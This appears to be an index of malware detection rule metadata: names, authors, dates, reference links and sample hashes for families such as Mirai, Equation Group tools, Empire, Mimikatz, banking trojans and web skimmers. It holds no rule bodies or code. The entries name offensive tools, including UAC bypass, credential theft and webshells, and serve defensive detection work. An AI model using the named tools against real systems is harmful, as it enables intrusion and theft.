malware_index WinntiPharma author: Jose Ramon Palanco copyright: Drainware, Inc. date: 2015-06-23 description: Backdoor Win64 Winnti Pharma ref: https://securelist.com/blog/research/70991/games-are-over/
malware_index WoolenGoldfish_Generic_3 description: Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ author: Florian Roth reference: http://goo.gl/NpJpVZ date: 2015/03/25 score: 90 hash1: 86222ef166474e53f1eb6d7e6701713834e6fee7 hash2: e8dbcde49c7f760165ebb0cb3452e4f1c24981f5
malware_index EquationGroup_elgingamble description: Equation Group hack tool leaked by ShadowBrokers- file elgingamble author: Florian Roth reference: https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1 date: 2017-04-08 hash1: 0573e12632e6c1925358f4bfecf8c263dd13edf52c633c9109fe3aae059b49dd
malware_index EquationGroup_sambal description: Equation Group hack tool leaked by ShadowBrokers- file sambal author: Florian Roth reference: https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1 date: 2017-04-08 hash1: 2abf4bbe4debd619b99cb944298f43312db0947217437e6b71b9ea6e9a1a4fec
malware_index EquationGroup__jparsescan_parsescan_5 description: Equation Group hack tool leaked by ShadowBrokers- from files jparsescan, parsescan author: Florian Roth reference: https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1 date: 2017-04-08 super_rule: 1 hash1: 8c248eec0af04300f3ba0188fe757850d283de84cf42109638c1c1280c822984 hash2: 942c12067b0afe9ebce50aa9dfdbf64e6ed0702d9a3a00d25b4fca62a38369ef
malware_index EquationGroup_Toolset_Apr17_Gen2 description: Detects EquationGroup Tool - April Leak author: Florian Roth reference: https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation date: 2017-04-15 super_rule: 1 hash1: 7fe425cd040608132d4f4ab2671e04b340a102a20c97ffdcf1b75be43a9369b5 hash2: 561c0d4fc6e0ff0a78613d238c96aed4226fbb7bb9ceea1d19bc770207a6be1e hash3: f2e90e04ddd05fa5f9b2fec024cd07365aebc098593d636038ebc2720700662b hash4: 8f7e10a8eedea37ee3222c447410fd5b949bd352d72ef22ef0b2821d9df2f5ba
malware_index EquationGroup_Toolset_Apr17_ntevt description: Detects EquationGroup Tool - April Leak author: Florian Roth reference: https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation date: 2017-04-15 hash1: 4254ee5e688fc09bdc72bcc9c51b1524a2bb25a9fb841feaf03bc7ec1a9975bf
malware_index EquationGroup_Toolset_Apr17_EXPA description: Detects EquationGroup Tool - April Leak author: Florian Roth reference: https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation date: 2017-04-15 hash1: 2017176d3b5731a188eca1b71c50fb938c19d6260c9ff58c7c9534e317d315f8
malware_index EquationGroup_Toolset_Apr17_DiBa_Target_BH description: Detects EquationGroup Tool - April Leak author: Florian Roth reference: https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation date: 2017-04-15 hash1: 7ae9a247b60dc31f424e8a7a3b3f1749ba792ff1f4ba67ac65336220021fce9f
malware_index EquationGroup_Toolset_Apr17_DiBa_Target description: Detects EquationGroup Tool - April Leak author: Florian Roth reference: https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation date: 2017-04-15 hash1: ffff3526ed0d550108e97284523566392af8523bbddb5f212df12ef61eaad3e6
malware_index EquationGroup_Toolset_Apr17_msgkd_msslu64_msgki_mssld description: Detects EquationGroup Tool - April Leak author: Florian Roth reference: https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation date: 2017-04-15 hash1: 9ab667b7b5b9adf4ff1d6db6f804824a22c7cc003eb4208d5b2f12809f5e69d0 hash2: 320144a7842500a5b69ec16f81a9d1d4c8172bb92301afd07fb79bc0eca81557 hash3: c10f4b9abee0fde50fe7c21b9948a2532744a53bb4c578630a81d2911f6105a3 hash4: 551174b9791fc5c1c6e379dac6110d0aba7277b450c2563e34581565609bc88e hash5: 8419866c9058d738ebc1a18567fef52a3f12c47270f2e003b3e1242d86d62a46
malware_index EquationGroup_Toolset_Apr17__vtuner_vtuner_1 description: Detects EquationGroup Tool - April Leak author: Florian Roth reference: https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation date: 2017-04-15 super_rule: 1 hash1: 3e6bec0679c1d8800b181f3228669704adb2e9cbf24679f4a1958e4cdd0e1431 hash2: b0d2ebf455092f9d1f8e2997237b292856e9abbccfbbebe5d06b382257942e0e
malware_index EquationGroup_Toolset_Apr17__ELV_ESKE_ETBL_ETRE_EVFR_11 description: Detects EquationGroup Tool - April Leak author: Florian Roth reference: https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation date: 2017-04-15 super_rule: 1 hash1: f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f hash2: 9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556 hash3: 70db3ac2c1a10de6ce6b3e7a7890c37bffde006ea6d441f5de6d8329add4d2ef hash4: e0f05f26293e3231e4e32916ad8a6ee944af842410c194fce8a0d8ad2f5c54b2 hash5: c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674
malware_index COZY_FANCY_BEAR_pagemgr_Hunt description: Detects a pagemgr.exe as mentioned in the CrowdStrike report author: Florian Roth reference: https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/ date: 2016-06-14
malware_index Furtim_nativeDLL description: Detects Furtim malware - file native.dll author: Florian Roth reference: MISP 3971 date: 2016-06-13 hash1: 4f39d3e70ed1278d5fa83ed9f148ca92383ec662ac34635f7e56cc42eeaee948
malware_index GEN_PowerShell description: Generic PowerShell Malware Rule author: https://github.com/interleaved
malware_index alina author: Brian Wallace @botnet_hunter author_email: bwall@ballastsecurity.net date: 2014-08-09 description: Identify Alina
malware_index Worm_Gamarue author: Centro Criptológico Nacional (CCN) ref: https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html description: Gamarue_Andromeda
malware_index AthenaHTTP author: Brian Wallace @botnet_hunter author_email: bwall@ballastsecurity.net date: 2014-08-09 description: Identify Athena HTTP
malware_index AthenaHTTP_v2 author: Jason Jones <jasonjones@arbor.net> description: Athena HTTP identification source: https://github.com/arbor/yara/blob/master/athena.yara
malware_index AthenaIRC author: Jason Jones <jasonjones@arbor.net> description: Athena IRC v1.8.x, 2.x identification source: https://github.com/arbor/yara/blob/master/athena.yara
malware_index Atmos_Builder description: Generic signature for Hacktool.Atmos.Builder cracked version author: xylitol@temari.fr reference: http://www.xylibox.com/2016/02/citadel-0011-atmos.html date: 20/08/2016
malware_index backoff author: Brian Wallace @botnet_hunter author_email: bwall@ballastsecurity.net date: 2014-08-21 description: Identify Backoff
malware_index BangatCode description: Bangat code features author: Seth Hardy last_modified: 2014-07-10
malware_index BangatStrings description: Bangat Identifying Strings author: Seth Hardy last_modified: 2014-07-10
malware_index Bangat description: Bangat author: Seth Hardy last_modified: 2014-07-10
malware_index BlackRev author: Dennis Schwarz date: 2013-05-21 description: Black Revolution DDoS Malware. http://www.arbornetworks.com/asert/2013/05/the-revolution-will-be-written-in-delphi/ origin: https://github.com/arbor/yara/blob/master/blackrev.yara
malware_index BlackWorm author: Brian Wallace @botnet_hunter author_email: bwall@ballastsecurity.net date: 2015-05-20 description: Identify BlackWorm
malware_index BoousetCode description: Boouset code tricks author: Seth Hardy last_modified: 2014-06-19
malware_index Bublik author: Kevin Falcoz date: 29/09/2013 description: Bublik Trojan Downloader
malware_index CAP_HookExKeylogger author: Brian C. Bell -- @biebsmalwareguy reference: https://github.com/DFIRnotes/rules/blob/master/CAP_HookExKeylogger.yar
malware_index ChickenDOS_Linux author: Jason Jones <jasonjones@arbor.net> description: Linux-variant of Chicken ident for both dropper and dropped file source: https://github.com/arbor/yara/blob/master/chicken.yara
malware_index citadel13xy author: Jean-Philippe Teissier / @Jipe_ description: Citadel 1.5.x.y trojan banker date: 2013-01-12 version: 1.0 filetype: memory
malware_index Citadel_Malware author: xylitol@temari.fr date: 2015-10-08 description: Search for nss3.dll pattern indicating an hexed copy of Citadel malware to work on firefox > v23.0
malware_index CookiesStrings description: Cookies Identifying Strings author: Seth Hardy last_modified: 2014-06-20
malware_index Cookies description: Cookies author: Seth Hardy last_modified: 2014-06-20
malware_index cxpidStrings description: cxpid Identifying Strings author: Seth Hardy last_modified: 2014-06-23
malware_index cxpidCode description: cxpid code features author: Seth Hardy last_modified: 2014-06-23
malware_index Cythosia author: Brian Wallace @botnet_hunter author_email: bwall@ballastsecurity.net date: 2015-03-21 description: Identify Cythosia
malware_index DDosTf author: benkow_ - MalwareMustDie reference: http://blog.malwaremustdie.org/2016/01/mmd-0048-2016-ddostf-new-elf-windows.html description: Rule to detect ELF.DDosTf infection
malware_index Derkziel description: Derkziel info stealer (Steam, Opera, Yandex, ...) author: The Malware Hunter filetype: pe date: 2015-11 md5: f5956953b7a4acab2e6fa478c0015972 site: https://zoo.mlw.re/samples/f5956953b7a4acab2e6fa478c0015972 reference: https://bhf.su/threads/137898/
malware_index dexter_strings author: Brian Wallace @botnet_hunter author_email: bwall@ballastsecurity.net date: 2014-09-10 description: Identify Dexter POSGrabber
malware_index diamond_fox author: Brian Wallace @botnet_hunter author_email: bwall@ballastsecurity.net date: 2015-08-22 description: Identify DiamondFox
malware_index Trj_Elex_Installer author: Centro Criptológico Nacional (CCN) description: Elex Installer ref: https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
malware_index Trj_Elex_Service64 author: Centro Criptológico Nacional (CCN) description: Elex Service 64 bits ref: https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
malware_index Empire_Get_SecurityPackages description: Detects Empire component - file Get-SecurityPackages.ps1 author: Florian Roth reference: https://github.com/adaptivethreat/Empire date: 2016-11-05 hash1: 5d06e99121cff9b0fce74b71a137501452eebbcd1e901b26bde858313ee5a9c1
malware_index Empire_Invoke_EgressCheck description: Detects Empire component - file Invoke-EgressCheck.ps1 author: Florian Roth reference: https://github.com/adaptivethreat/Empire date: 2016-11-05 hash1: e2d270266abe03cfdac66e6fc0598c715e48d6d335adf09a9ed2626445636534
malware_index Empire_PowerShell_Framework_Gen2 description: Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-CredentialInjection.ps1, Invoke-DCSync.ps1, Invoke-DCSync.ps1, Invoke-Mimikatz.ps1, Invoke-PSInject.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1, Invoke-ReflectivePEInjection.ps1 author: Florian Roth reference: https://github.com/adaptivethreat/Empire date: 2016-11-05 super_rule: 1 hash1: 1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8 hash3: a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28 hash5: 4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3 hash6: 61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4 hash8: eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5
malware_index Empire_Invoke_CredentialInjection_Invoke_Mimikatz_Gen description: Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-Mimikatz.ps1 author: Florian Roth reference: https://github.com/adaptivethreat/Empire date: 2016-11-05 super_rule: 1 hash1: 1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8 hash2: 4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3
malware_index EnfalCode description: Enfal code tricks author: Seth Hardy last_modified: 2014-06-19
malware_index EnfalStrings description: Enfal Identifying Strings author: Seth Hardy last_modified: 2014-06-19
malware_index Enfal description: Enfal author: Seth Hardy last_modified: 2014-06-19
malware_index Win7Elevatev2 description: Detects Win7Elevate - Windows UAC bypass utility author: Florian Roth reference: http://www.pretentiousname.com/misc/W7E_Source/Win7Elevate_Inject.cpp.html date: 2015-05-14 hash1: 4f53ff6a04e46eda92b403faf42219a545c06c29 hash2: 808d04c187a524db402c5b2be17ce799d2654bd1 score: 60
malware_index UACME_Akagi description: Rule to detect UACMe - abusing built-in Windows AutoElevate backdoor author: Florian Roth reference: https://github.com/hfiref0x/UACME date: 2015-05-14 hash1: edd2138bbd9e76c343051c6dc898054607f2040a hash2: e3a919ccc2e759e618208ededa8a543954d49f8a score: 60
malware_index EzcobStrings description: Ezcob Identifying Strings author: Seth Hardy last_modified: 2014-06-23
malware_index Ezcob description: Ezcob author: Seth Hardy last_modified: 2014-06-23
malware_index ws_f0xy_downloader description: f0xy malware downloader author: Nick Griffin (Websense)
malware_index FavoriteCode description: Favorite code features author: Seth Hardy last_modified: 2014-06-24
malware_index FavoriteStrings description: Favorite Identifying Strings author: Seth Hardy last_modified: 2014-06-24
malware_index genome author: Brian Wallace @botnet_hunter author_email: bwall@ballastsecurity.net date: 2014-09-07 description: Identify Genome
malware_index GlassesCode description: Glasses code features author: Seth Hardy last_modified: 2014-07-22
malware_index Glasses description: Glasses family author: Seth Hardy last_modified: 2014-07-22
malware_index GoziRule description: Win32.Gozi author: CCN-CERT version: 1.0 ref: https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
malware_index Grozlex author: Kevin Falcoz date: 20/08/2013 description: Grozlex Stealer - Possible HCStealer
malware_index Hsdfihdf author: Adam Ziaja <adam@adamziaja.com> http://adamziaja.com date: 2014-04-06 description: Polish banking malware hash0: db1675c74a444fd35383d9a45631cada hash1: f48ba39df38056449a3e9a1a7289f657 filetype: exe
malware_index IMulerCode description: IMuler code tricks author: Seth Hardy last_modified: 2014-06-16
malware_index IMulerStrings description: IMuler Identifying Strings author: Seth Hardy last_modified: 2014-06-16
malware_index IMuler description: IMuler author: Seth Hardy last_modified: 2014-06-16
malware_index iexpl0reCode description: iexpl0re code features author: Seth Hardy last_modified: 2014-07-21
malware_index iexpl0reStrings description: Strings used by iexpl0re author: Seth Hardy last_modified: 2014-07-21
malware_index iexpl0re description: iexpl0re family author: Seth Hardy last_modified: 2014-07-21
malware_index Insta11Code description: Insta11 code features author: Seth Hardy last_modified: 2014-06-23
malware_index Insta11Strings description: Insta11 Identifying Strings author: Seth Hardy last_modified: 2014-06-23
malware_index Insta11 description: Insta11 author: Seth Hardy last_modified: 2014-06-23
malware_index Intel_Virtualization_Wizard_exe author: cabrel@zerklabs.com description: Dynamic DLL abuse executable file_1_seen: 2013-05-21 file_1_sha256: 7787757ae851f4a162f46f794be1532ab78e1928185212bdab83b3106f28c708
malware_index Intel_Virtualization_Wizard_dll author: cabrel@zerklabs.com description: Dynamic DLL (Malicious) file_1_seen: 2013-05-21 file_1_sha256: 485ae043b6a5758789f1d33766a26d8b45b9fde09cde0512aa32d4bd1ee04f28
malware_index KelihosHlux author: @malpush maltype: KelihosHlux description: http://malwared.ru date: 22/02/2014
malware_index korlia author: Nick Hoffman company: Morphick reference: http://www.morphick.com/resources/lab-blog/curious-korlia information: korlia malware found in apt dump
malware_index SharedStrings description: Internal names found in LURK0/CCTV0 samples author: Katie Kleemola last_updated: 07-22-2014
malware_index lateral_movement date: 3/12/2014 author: https://github.com/reed1713 description: methodology sig looking for signs of lateral movement
malware_index lost_door author: Kevin Falcoz date: 23/02/2013 description: Lost Door
malware_index LuckyCatCode description: LuckyCat code tricks author: Seth Hardy last_modified: 2014-06-19
malware_index MacControlCode description: MacControl code tricks author: Seth Hardy last_modified: 2014-06-17
malware_index MacControlStrings description: MacControl Identifying Strings author: Seth Hardy last_modified: 2014-06-17
malware_index MacControl description: MacControl author: Seth Hardy last_modified: 2014-06-16
malware_index dump_sales_quote_payment
malware_index dump_sales_order
malware_index md5_64651cede2467fdeb1b3b7e6ff3f81cb
malware_index md5_6bf4910b01aa4f296e590b75a3d25642
malware_index fopo_webshell
malware_index eval_post
malware_index spam_mailer
malware_index md5_2c37d90dd2c9c743c273cb955dd83ef6
malware_index md5_3ccdd51fe616c08daafd601589182d38
malware_index md5_4b69af81b89ba444204680d506a8e0a1
malware_index md5_71a7c769e644d8cf3cf32419239212c7
malware_index md5_87cf8209494eedd936b28ff620e28780
malware_index md5_fb9e35bf367a106d18eb6aa0fe406437
malware_index md5_8e5f7f6523891a5dcefcbb1a79e5bbe9
malware_index eval_base64_decode_a
malware_index md5_ab63230ee24a988a4a9245c2456e4874
malware_index md5_d30b23d1224438518d18e90c218d7c8b
malware_index md5_24f2df1b9d49cfb02d8954b08dba471f
malware_index md5_fd141197c89d27b30821f3de8627ac38
malware_index visbot
malware_index md5_4c4b3d4ba5bce7191a5138efa2468679
malware_index md5_6eb201737a6ef3c4880ae0b8983398a9
malware_index md5_d201d61510f7889f1a47257d52b15fa2
malware_index md5_06e3ed58854daeacf1ed82c56a883b04
malware_index md5_28690a72362e021f65bb74eecc54255e
malware_index fake_magentoupdate_site
malware_index md5_4aa900ddd4f1848a15c61a9b7acd5035
malware_index sinlesspleasure_com
malware_index amasty_biz
malware_index amasty_biz_js
malware_index cloudfusion_me
malware_index grelos_v
malware_index hacked_domains
malware_index jquery_code_su
malware_index jquery_code_su_multi
malware_index Trafficanalyzer_js
malware_index atob_js
malware_index googieplay_js
malware_index mag_php_js
malware_index thetech_org_js
malware_index md5_cdn_js_link_js
malware_index Trojan_W32_Gh0stMiancha_1_0_0 Author: Context Threat Intelligence Date: 2014/01/27 Description: Bytes inside Reference: http://www.contextis.com/documents/30/TA10009_20140127_-_CTI_Threat_Advisory_-_The_Monju_Incident1.pdf
malware_index Mirai_Generic_Arch description: Mirai Botnet TR-069 Worm - Generic Architecture author: Felipe Molina / @felmoltor date: 2016-12-04 version: 1.0 ref1: http://www.theregister.co.uk/2016/11/28/router_flaw_exploited_in_massive_attack/ ref2: https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759 ref3: https://krebsonsecurity.com/2016/11/new-mirai-worm-knocks-900k-germans-offline/
malware_index Mirai_4 description: Mirai Variant 4 author: Joan Soriano / @joanbtl date: 2017-04-16 version: 1.0 MD5: f832ef7a4fcd252463adddfa14db43fb SHA1: 4455d237aadaf28aafce57097144beac92e55110
malware_index Mirai_Dwnl description: Mirai Downloader author: Joan Soriano / @joanbtl date: 2017-04-16 version: 1.0 MD5: 85784b54dee0b7c16c57e3a3a01db7e6 SHA1: 6f6c625ef730beefbc23c7f362af329426607dee
malware_index Mirai_5 description: Mirai Variant 5 author: Joan Soriano / @joanbtl date: 2017-04-16 version: 1.0 MD5: 7e17c34cddcaeb6755c457b99a8dfe32 SHA1: b63271672d6a044704836d542d92b98e2316ad24
malware_index memory_pivy author: https://github.com/jackcr/
malware_index memory_shylock author: https://github.com/jackcr/
malware_index Cloaked_as_JPG description: Detects a cloaked file as JPG author: Florian Roth (eval section from Didier Stevens) date: 2015/02/29 score: 70
malware_index rtf_yahoo_ken author: @patrickrolsen maltype: Yahoo Ken filetype: RTF version: 0.1 description: Test rule date: 2013-12-14
malware_index ZXProxy author: ThreatConnect Intelligence Research Team
malware_index EmiratesStatement Author: Christiaan Beek Date: 2013-06-30 Description: Credentials Stealing Attack Reference: https://blogs.mcafee.com/mcafee-labs/targeted-campaign-steals-credentials-in-gulf-states-and-caribbean hash0: 0e37b6efe5de1cc9236017e003b1fc37 hash1: a28b22acf2358e6aced43a6260af9170 hash2: 6f506d7adfcc2288631ed2da37b0db04 hash3: 8aebade47dc1aa9ac4b5625acf5ade8f
malware_index SpyGate_v2_9 date: 2014/09 maltype: Spygate v2.9 Remote Access Trojan filetype: exe reference: https://blogs.mcafee.com/mcafee-labs/middle-east-developer-spygate-struts-stuff-online
malware_index qadars author: Jean-Philippe Teissier / @Jipe_ description: Qadars - Mobile part. Maybe Perkele. version: 1.0 filetype: memory ref1: http://www.lexsi-leblog.fr/cert/qadars-nouveau-malware-bancaire-composant-mobile.html
malware_index shylock author: Jean-Philippe Teissier / @Jipe_ description: Shylock Banker date: 2013-12-12 version: 1.0 ref1: http://iocbucket.com/iocs/1b4660d57928df5ca843c21df0b2adb117026cba ref2: http://www.trusteer.com/blog/merchant-fraud-returns-%E2%80%93-shylock-polymorphic-financial-malware-infections-rise ref3: https://www.csis.dk/en/csis/blog/3811/
malware_index spyeye author: Jean-Philippe Teissier / @Jipe_ description: SpyEye X.Y memory date: 2012-05-23 version: 1.0 filetype: memory
malware_index spyeye_plugins author: Jean-Philippe Teissier / @Jipe_ description: SpyEye X.Y Plugins memory date: 2012-05-23 version: 1.0 filetype: memory
malware_index callTogether_certificate Author: Fireeye Labs Date: 2014/11/03 Description: detects binaries signed with the CallTogether certificate Reference: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
malware_index qti_certificate Author: Fireeye Labs Date: 2014/11/03 Description: detects binaries signed with the QTI International Inc certificate Reference: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
malware_index DownExecute_A Author: PwC Cyber Threat Operations :: @tlansec Date: 2015/04/27 Description: Malware is often wrapped/protected, best to run on memory Reference: http://pwc.blogs.com/cyber_security_updates/2015/04/attacks-against-israeli-palestinian-interests.html
malware_index Pandora author: Kevin Breen <kevin@techanarchy.net> date: 2014/04 ref: http://malwareconfig.com/stats/Pandora maltype: Remote Access Trojan filetype: exe
malware_index Base64_encoded_Executable description: Detects an base64 encoded executable (often embedded) author: Florian Roth date: 2015-05-28 score: 50
malware_index Invoke_mimikittenz description: Detects Mimikittenz - file Invoke-mimikittenz.ps1 author: Florian Roth reference: https://github.com/putterpanda/mimikittenz date: 2016-07-19 score: 90 hash1: 14e2f70470396a18c27debb419a4f4063c2ad5b6976f429d47f55e31066a5e6a
malware_index LinuxAESDDoS Author: @benkow_ Date: 2014/09/12 Description: Strings inside Reference: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483
malware_index LinuxBillGates Author: @benkow_ Date: 2014/08/11 Description: Strings inside Reference: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3429
malware_index LinuxElknot Author: @benkow_ Date: 2013/12/24 Description: Strings inside Reference: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3099
malware_index LinuxMrBlack Author: @benkow_ Date: 2014/09/12 Description: Strings inside Reference: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483
malware_index LinuxTsunami Author: @benkow_ Date: 2014/09/12 Description: Strings inside Reference: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483
malware_index rootkit author: xorseed reference: https://stuff.rop.io/
malware_index exploit author: xorseed reference: https://stuff.rop.io/
malware_index NSFreeCode description: NSFree code features author: Seth Hardy last_modified: 2014-06-24
malware_index NSFreeStrings description: NSFree Identifying Strings author: Seth Hardy last_modified: 2014-06-24
malware_index NSFree description: NSFree author: Seth Hardy last_modified: 2014-06-24
malware_index NaikonCode description: Naikon code features author: Seth Hardy last_modified: 2014-06-25
malware_index NaikonStrings description: Naikon Identifying Strings author: Seth Hardy last_modified: 2014-06-25
malware_index Naikon description: Naikon author: Seth Hardy last_modified: 2014-06-25
malware_index nAspyUpdateCode description: nAspyUpdate code features author: Seth Hardy last_modified: 2014-07-14
malware_index nAspyUpdateStrings description: nAspyUpdate Identifying Strings author: Seth Hardy last_modified: 2014-07-14
malware_index nAspyUpdate description: nAspyUpdate author: Seth Hardy last_modified: 2014-07-14
malware_index NetpassStrings description: Identifiers for netpass variant author: Katie Kleemola last_updated: 2014-05-29
malware_index NetPass description: netpass variant author: Katie Kleemola last_updated: 2014-07-08
malware_index NetTravStrings description: Identifiers for NetTraveler DLL author: Katie Kleemola last_updated: 2014-05-20
malware_index NetTravExports description: Export names for dll component author: Katie Kleemola last_updated: 2014-05-20
malware_index NetTraveler description: Nettravelr author: Katie Kleemola last_updated: 2014-07-08
malware_index NionSpy description: Triggers on old and new variants of W32/NionSpy file infector reference: https://blogs.mcafee.com/mcafee-labs/taking-a-close-look-at-data-stealing-nionspy-file-infector
malware_index TROJAN_Notepad Author: RSA_IR Date: 4Jun13 File: notepad.exe v 1.1 MD5: 106E63DBDA3A76BEEB53A8BBD8F98927
malware_index Odinaff_swift author: @j0sm1 date: 2016/10/27 description: Odinaff malware reference: https://www.symantec.com/security_response/writeup.jsp?docid=2016-083006-4847-99 filetype: binary
malware_index OlyxCode description: Olyx code tricks author: Seth Hardy last_modified: 2014-06-19
malware_index OlyxStrings description: Olyx Identifying Strings author: Seth Hardy last_modified: 2014-06-19
malware_index Olyx description: Olyx author: Seth Hardy last_modified: 2014-06-19
malware_index pony author: Brian Wallace @botnet_hunter author_email: bwall@ballastsecurity.net date: 2014-08-16 description: Identify Pony
malware_index PubSabCode description: PubSab code tricks author: Seth Hardy last_modified: 2014-06-19
malware_index PubSabStrings description: PubSab Identifying Strings author: Seth Hardy last_modified: 2014-06-19
malware_index PubSab description: PubSab author: Seth Hardy last_modified: 2014-06-19
malware_index PE_File_pyinstaller author: Didier Stevens (https://DidierStevens.com) description: Detect PE file produced by pyinstaller reference: https://isc.sans.edu/diary/21057
malware_index QuarianStrings description: Quarian Identifying Strings author: Seth Hardy last_modified: 2014-07-09
malware_index QuarianCode description: Quarian code features author: Seth Hardy last_modified: 2014-07-09
malware_index Quarian description: Quarian author: Seth Hardy last_modified: 2014-07-09
malware_index RegSubDatStrings description: RegSubDat Identifying Strings author: Seth Hardy last_modified: 2014-07-14
malware_index RegSubDat description: RegSubDat author: Seth Hardy last_modified: 2014-07-14
malware_index Retefe author: bartblaze description: Retefe
malware_index RooterCode description: Rooter code features author: Seth Hardy last_modified: 2014-07-10
malware_index Rooter description: Rooter author: Seth Hardy last_modified: 2014-07-10
malware_index RookieStrings description: Rookie Identifying Strings author: Seth Hardy last_modified: 2014-06-25
malware_index Rookie description: Rookie author: Seth Hardy last_modified: 2014-06-25
malware_index rovnix_downloader author: Intel Security description: Rovnix downloader with sinkhole checks reference: https://blogs.mcafee.com/mcafee-labs/rovnix-downloader-sinkhole-time-checks/
malware_index SafeNetCode description: SafeNet code features author: Seth Hardy last_modified: 2014-07-16
malware_index SafeNetStrings description: Strings used by SafeNet author: Seth Hardy last_modified: 2014-07-16
malware_index SafeNet description: SafeNet family
malware_index ScarhiknStrings description: Scarhikn Identifying Strings author: Seth Hardy last_modified: 2014-06-25
malware_index ScarhiknCode description: Scarhikn code features author: Seth Hardy last_modified: 2014-06-25
malware_index Scarhikn description: Scarhikn author: Seth Hardy last_modified: 2014-06-25
malware_index sendsafe author: J from THL <j@techhelplist.com> date: 2016/09 reference: http://pastebin.com/WPWWs406 version: 2 maltype: Spammer filetype: memory
malware_index CrowdStrike_Shamoon_DroppedFile description: Rule to detect Shamoon malware http://goo.gl/QTxohN reference: http://www.rsaconference.com/writable/presentations/file_upload/exp-w01-hacking-exposed-day-of-destruction.pdf
malware_index EldoS_RawDisk description: EldoS Rawdisk Device Driver (Commercial raw disk access driver - used in Operation Shamoon 2.0) author: Florian Roth (with Binar.ly) reference: https://goo.gl/jKIfGB date: 2016-12-01 score: 50 hash1: 47bb36cd2832a18b5ae951cf5a7d44fba6d8f5dca0a372392d40f51d1fe1ac34 hash2: 394a7ebad5dfc13d6c75945a61063470dc3b68f7a207613b79ef000e1990909b
malware_index Shifu reference: https://blogs.mcafee.com/mcafee-labs/japanese-banking-trojan-shifu-combines-malware-tools/ author: McAfee Labs
malware_index skeleton_key_patcher description: Skeleton Key Patcher from Dell SecureWorks Report http://goo.gl/aAk3lN author: Dell SecureWorks Counter Threat Unit reference: http://goo.gl/aAk3lN date: 2015/01/13 score: 70
malware_index skeleton_key_injected_code description: Skeleton Key injected Code http://goo.gl/aAk3lN author: Dell SecureWorks Counter Threat Unit reference: http://goo.gl/aAk3lN date: 2015/01/13 score: 70
malware_index Spora author: pekeinfo date: 2017-02-22 description: Spora
malware_index unk_packer author: pekeinfo date: 2017-02-22 description: Spora & Cerber ek
malware_index with_sqlite author: Julian J. Gonzalez <info@seguridadparatodos.es> reference: http://www.st2labs.com description: Rule to detect the presence of SQLite data in raw image
malware_index universal_1337_stealer_serveur author: Kevin Falcoz date: 24/02/2013 description: Universal 1337 Stealer Serveur
malware_index RSharedStrings description: identifiers for remote and gmremote author: Katie Kleemola last_updated: 07-21-2014
malware_index GmRemoteStrings description: identifiers for gmremote: surtr stage 2 author: Katie Kleemola last_updated: 07-21-2014
malware_index GmRemote description: identifier for gmremote author: Katie Kleemola last_updated: 07-25-2014
malware_index SurtrStrings author: Katie Kleemola description: Strings for Surtr last_updated: 2014-07-16
malware_index SurtrCode author: Katie Kleemola description: Code features for Surtr Stage1 last_updated: 2014-07-16
malware_index Surtr author: Katie Kleemola description: Rule for Surtr Stage One last_updated: 2014-07-16
malware_index T5000Strings description: T5000 Identifying Strings author: Seth Hardy last_modified: 2014-06-26
malware_index T5000 description: T5000 author: Seth Hardy last_modified: 2014-06-26
malware_index Tedroo author: Kevin Falcoz date: 22/11/2015 description: Tedroo Spammer
malware_index Tinba2 author: n3sfox <n3sfox@gmail.com> date: 2015/11/07 description: Tinba 2 (DGA) banking trojan reference: https://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world filetype: memory hash1: c7f662594f07776ab047b322150f6ed0 hash2: dc71ef1e55f1ddb36b3c41b1b95ae586 hash3: b788155cb82a7600f2ed1965cffc1e88
malware_index ELF_Linux_Torte_domains author: @mmorenog,@yararules description: Detects ELF Linux/Torte infection ref1: http://blog.malwaremustdie.org/2016/01/mmd-0050-2016-incident-report-elf.html
